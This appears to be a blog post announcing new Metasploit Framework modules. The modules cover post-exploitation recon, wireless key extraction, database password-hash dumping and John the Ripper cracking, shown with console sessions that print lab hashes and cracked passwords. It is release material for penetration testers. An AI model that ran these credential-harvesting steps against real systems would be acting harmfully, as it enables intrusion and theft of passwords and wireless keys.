The Metasploit Framework continues to grow and expand with the support of the community. There have been many new features added to the Metasploit Framework over the past month. I am very excited to be able to share some of these new developments with you.

Mubix's Recon Modules

Mubix's post-exploitation modules form his Derbycon talk are now in the repository. The resolve_hostname module, originally called 'Dig', will take a given hostname and resolve the IP address for that host from the windows victim. The enum_termserv module will dump Windows RDP connections form the victim machine, to give you a list of other potential  targets. The computer_browser_discovery module, formerly called netdiscovery, taps the victim machine's Computer Browser Service via Railgun. This will return a list of all machines available on the same broadcast domain as the victim machine. an addition to mubix's original module has been made to give users the options to create host records in the Metasploit database for any hosts discovered this way.

[*] [2011.12.05-15:35:57] Found 4 systems.

.

...[*] [2011.12.05-15:36:02] Netdiscovery Results

====================

TYPE     IP            COMPUTER NAME   VERSION  COMMENT

----     --            -------------   -------  -------

69635    192.168.2.35  WINXPTEST       5.1

69635    192.168.2.9   MELODIE         6.1

8556551  DMALONEY-VDSDA  5.2

Windows Wireless LAN

There are a new group of Windows Post modules under post/windows/wlan. These modules all use Railgun to hook the windows WLANAPI. There are currently four modules in this group:

wlan_profile: This module will enumerate all of the wireless LAN interfaces on the machine. It will then enumerate all the saved wireless profiles on each interface. If the meterpreter session has sufficient privileges it will also decrypt the wireless key material. One caveat to this last part is that Windows XP does not actually store the WPA keyphrase. It instead stores the derived key which was derived using the PBKDF2() function. since this is all windows stores, it is surely still usable in this format but does not do you any good from a password reuse standpoint. On the TODO list is another module that will make the victim machine connect to a specific network with the option of using one of the pre-saved profiles or passing it your own profile.

msf  post(wlan_profile) > set SESSION 1

SESSION => 1

msf  post(wlan_profile) > exploit

[ ] Wireless LAN Profile Information

GUID: {eb566b46-0140-4eca-800a-a5e01fae7251} Description: Intel(R) Centrino(R) Advanced-N 6230 State: The interface is connected to a network.

Profile Name: derbycon

derbycon

6465726279636F6E

derbycon

ESS

auto

WPA2PSK

AES

false

passPhrase

false

derbycon

wlan_current_connection: This module will enumerate all of the wireless LAN interfaces on the victim machine, and then get information about the current wireless connection on each one. This information includes the MAC address of the access point, the SSID, the BSS type, the connection type, signal strength, RX/TX rates, security settings, encryption and authentication algorithms used, and whether 802.1x authentication is used on the network.

msf  post(wlan_current_connection) > set SESSION 1

SESSION => 1

msf  post(wlan_current_connection) > exploit

[ ] GUID: {eb566b46-0140-4eca-800a-a5e01fae7251}

Description: Intel(R) Centrino(R) Advanced-N 6230

State: The interface is connected to a network.

Mode: connection initiated by wireless service automatically using a persistent profile.

Profile: Skynet

SSID: Skynet

AP MAC: xx:xx:xx:xx:xx:xx

BSS Type: Infrastructure

Physical Type: Extended rate PHY type

Signal Strength: 94

RX Rate: 54000

TX Rate: 54000

Security Enabled: Yes

oneX Enabled: No

Authentication Algorithm: WPA-PSK

Cipher Algorithm: TKIP

[*] WlanAPI Handle Closed Successfully

[*] Post module execution completed

wlan_bss_list: This module will enumerate all of the wireless LAN interfaces on the machine. It will then scan with each interface for new wireless networks. It then records the information about all of the available wireless networks. This information includes a lot of the same information pulled down by the current_connection module.

msf  post(wlan_bss_list) > set SESSION 1

SESSION => 1

msf  post(wlan_bss_list) > exploit

[*] {"GetLastError"=>0, "return"=>0, "ppWlanBssList"=>5282784}

[*] Number of Networks: 16

[ ] SSID: horton

BSSID: xx:xx:xx:xx:xx:xx

Type: Infrastructure

PHY: Extended rate PHY type

RSSI: -90

Signal: 16

[ ] SSID: Skynet

BSSID:  xx:xx:xx:xx:xx:xx

Type: Infrastructure

PHY: 802.11n PHY type

RSSI: -25

Signal: 99

[ ] SSID: WIN_930

BSSID:  xx:xx:xx:xx:xx:xx

Type: Infrastructure

PHY: Extended rate PHY type

RSSI: -89

Signal: 18

[ ] SSID: The Dragisic Network

BSSID:  xx:xx:xx:xx:xx:xx

Type: Infrastructure

PHY: Extended rate PHY type

RSSI: -86

Signal: 23

[ ] SSID: jacob1

BSSID: xx:xx:xx:xx:xx:xx

Type: Infrastructure

PHY: Extended rate PHY type

RSSI: -76

Signal: 40

[ ] SSID: WIN_BA74

BSSID:  xx:xx:xx:xx:xx:xx

Type: Infrastructure

PHY: Extended rate PHY type

RSSI: -78

Signal: 36

[ ] SSID: MonroeMFC

BSSID:  xx:xx:xx:xx:xx:xx

Type: Infrastructure

PHY: Extended rate PHY type

RSSI: -90

Signal: 16

[ ] SSID: starmonster

BSSID:  xx:xx:xx:xx:xx:xx

Type: Infrastructure

PHY: Extended rate PHY type

RSSI: -81

Signal: 31

[ ] SSID: Eric Home

BSSID:  xx:xx:xx:xx:xx:xx

Type: Infrastructure

PHY: Extended rate PHY type

RSSI: -87

Signal: 21

[ ] SSID: linksys

BSSID:  xx:xx:xx:xx:xx:xx

Type: Infrastructure

PHY: High-rate DSSS (HRDSSS)

RSSI: -74

Signal: 43

[ ] SSID: Tarheel_Country

BSSID:  xx:xx:xx:xx:xx:xx

Type: Infrastructure

PHY: Extended rate PHY type

RSSI: -72

Signal: 46

[ ] SSID: W32.Blaster.Worm

BSSID:  xx:xx:xx:xx:xx:xx

Type: Infrastructure

PHY: Extended rate PHY type

RSSI: -80

Signal: 33

[ ] SSID: Leidi

BSSID:  xx:xx:xx:xx:xx:xx

Type: Infrastructure

PHY: Extended rate PHY type

RSSI: -88

Signal: 20

[ ] SSID: theriault

BSSID:  xx:xx:xx:xx:xx:xx

Type: Infrastructure

PHY: 802.11n PHY type

RSSI: -81

Signal: 31

[ ] SSID: EckerNet

BSSID:  xx:xx:xx:xx:xx:xx

Type: Infrastructure

PHY: Extended rate PHY type

RSSI: -75

Signal: 41

[ ] SSID: Belkin_G MIMO_Wireless_E5A125

BSSID:  xx:xx:xx:xx:xx:xx

Type: Infrastructure

PHY: Extended rate PHY type

RSSI: -87

Signal: 21

[*] WlanAPI Handle Closed Successfully

[*] Post module execution completed

wlan_disconnect: This module takes an integer as an argument. that Integer is the index of the interface you want to target. Most machines will likely only have 1 wireless interface, and so this option can be left on the default value of 0. The module will disconnect the specified wireless interface from whatever network it is currently connected to. This will be more useful when the module to connect the interface to a specified network is done.

Database Hash dumping

There are some interesting new Auxiliary modules in the framework now too. These are hashdump modules for several of the more popular database servers: MSSQL, MySQL, Postgres, and Oracle. The modules take supplied credentials and log onto the databases on a given port across a supplied RHOSTS list. It will then attempt to dump all the database user password hashes. If it succeeds, it will then store them in a csv as loot for further cracking. These modules will also attempt to save all the database, table, and instance names from the database. It will use these for wordlist building when attempting to crack the hashes.

msf  auxiliary(mssql_hashdump) > exploit

[*] Instance Name: "WINTEST2008"

[ ] 192.168.2.13:1055 - Saving mssql05.hashes = sa:010051aa13a36f6efb5296ee8b804138173e0696d0892c52fcb6

[ ] 192.168.2.13:1055 - Saving mssql05.hashes = ##MS_PolicyEventProcessingLogin##:010031b4ae8d43c66a1a17f5f5e7da86a1764dc48ddc6 babdd9e

[ ] 192.168.2.13:1055 - Saving mssql05.hashes = ##MS_PolicyTsqlExecutionLogin##:010094044117b73bd4051b810dab0b7db5e3cbd8bb402c3 6ffe0

[ ] 192.168.2.13:1055 - Saving mssql05.hashes = user1:01006dcfe5ee776f7fa8210a33c5bf2aaaef2b5ee25f315a2890

[ ] 192.168.2.13:1055 - Saving mssql05.hashes = user2:0100acc65dd1643d5a43320af56bc37861e6ba4af7b9a0e866ee

[ ] 192.168.2.13:1055 - Saving mssql05.hashes = user3:0100e838d7b99cedfb902161be09e3e859f2aca099f5eb49684b

[ ] 192.168.2.13:1055 - Saving mssql05.hashes = user4:0100a9ec455822cb06dcb752390725649dbf669aa1994669a1ce

[ ] 192.168.2.13:1055 - Saving mssql05.hashes = user5:0100a5a9092099814984bbbf0aa851477b5edbd1a5406ba1bebb

[ ] 192.168.2.13:1055 - Saving mssql05.hashes = user6:01001d924e4d071f25849387181a2c1b0336b60baecf3e78b874

[ ] 192.168.2.13:1055 - Saving mssql05.hashes = user7:01001e0a03d8f99fb1355ae09ebde36686f1041c072e4111f999

[ ] 192.168.2.13:1055 - Saving mssql05.hashes = user8:0100c506c9b67d8592f9f36982c82f8907ac38258b1fe358a84c

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf  auxiliary(mssql_hashdump) >

Linux unshadow

The auxiliary/analyze/jtr_unshadow module is another new addition. This module exists for scenarios where you can pull arbitrary files off victim machines in less standard ways, such as directory traversal attacks. It will take paths to locally stored passwd and shadow files. It will then unshadow the passwd file and store it as loot for future cracking.

New Password Cracking Options

Building on the success of our first John the Ripper(JtR) cracking module, we now have a few more. There are John the Ripper modules for cracking Microsoft SQL Server, MySql, Oracle, and Linux hashes. It will look for the database hashes in the loot files created by the previously mentioned hashdump modules. All of these modules will assemble a wordlist based on a number of things:

  1. The default wordlist we ship with
  2. All usernames and passwords currently stored in the creds table
  3. All hostnames in the hosts table
  4. Any passwords already cracked by JtR (in the .pot file)
  5. Any captured MSSQL instance names
  6. Any database and table names gathered by db hashdump modules
  7. An optional user supplied wordlist

All of these items are pulled together, and uniqued to create a wordlist for cracking. It will then attempt limited password cracking using these wordlists and some fast and easy cracking rules. These modules are not a thorough cracking attempt, but rather an attempt to crack the quick and easy hashes. any hashes that are successfully cracked are then stored as creds in the database.

msf  auxiliary(mssql_hashdump) > use auxiliary/analyze/jtr_mssql_fast

msf  auxiliary(jtr_mssql_fast) > exploit

[*] Cracking MSSQL Hashes

[*] Cracking MSSQL05 Hashes

[*] HashList: /tmp/jtrtmp20111205-10995-2yklnu-0

[*] Trying Wordlist: /tmp/jtrtmp20111205-10995-1s8wt88-0

guesses: 5  time: 0:00:01:20 DONE (Mon Dec  5 15:13:41 2011)  c/s: 3436K  trying: �tude1900

Use the "--show" option to display all of the cracked passwords reliably

[*] Output: Loaded 11 password hashes with 11 different salts (MS-SQL05 [ms-sql05])

[*] Output: WINTEST2008      (user6)

[*] Output: password2        (user2)

[*] Output: password2        (user1)

[*] Output: user3            (user3)

[*] Output: password8        (user8)

[*] Trying Rule: All4...

Warning: mixed-case charset, but the current hash type is case-insensitive;

some candidate passwords may be unnecessarily tried more than once.

guesses: 0  time: 0:00:02:05 DONE (Mon Dec  5 15:15:47 2011)  c/s: 3947K  trying: |||}

[*] Output: Loaded 11 password hashes with 11 different salts (MS-SQL05 [ms-sql05])

[*] Output: Remaining 6 password hashes with 6 different salts

[*] Trying Rule: Digits5...

guesses: 0  time: 0:00:00:00 DONE (Mon Dec  5 15:15:47 2011)  c/s: 2898K  trying: 89092

[*] Output: Loaded 11 password hashes with 11 different salts (MS-SQL05 [ms-sql05])

[*] Output: Remaining 6 password hashes with 6 different salts

[*] user1:password2:192.168.2.13:1055

[*] user2:password2:192.168.2.13:1055

[*] user3:user3:192.168.2.13:1055

[*] user6:WINTEST2008:192.168.2.13:1055

[*] user8:password8:192.168.2.13:1055

[*]

[*] 5 password hashes cracked, 6 left

[*] 5 hashes were cracked!

[ ] Host: 192.168.2.13 Port: 1055 User: user1 Pass: password2

[ ] Host: 192.168.2.13 Port: 1055 User: user2 Pass: password2

[ ] Host: 192.168.2.13 Port: 1055 User: user3 Pass: user3

[ ] Host: 192.168.2.13 Port: 1055 User: user6 Pass: WINTEST2008

[ ] Host: 192.168.2.13 Port: 1055 User: user8 Pass: password8

[*] Auxiliary module execution completed

msf  auxiliary(jtr_mssql_fast) >

One thing to note is that the jtr_linux module is not listed as fast mode. This is because this module can be very slow depending on the type of Linux hashes it is trying to crack. If the hashes were created using crypt(3) this module can be VERY slow.

There is also one other hash cracking module that does not use JtR. This is the postgres_md5_crack module. JtR currently does not support Postgres md5 hashes. These hashes are create by taking the password and appending the username before md5 hashing it. The postgres_md5_crack module generates a wordlist the same way the JtR modules do. It then takes each word appends the username of the hash being tried, md5 hashes it and compare against the hash. If it's a match it saves the discovered cred in the database. This module can actually move surprisingly fast, but is not necessarily a thorough cracking method.

These are just some of the new features that have been added to the Metasploit Framework over the past month. Stay tuned as there are sure to be even more great new features coming. If there is something that Metasploit doesn't do, that you think it should, let us know. Better yet, try your hand at writing it yourself and send us a Pull Request on Github! Cheers for now.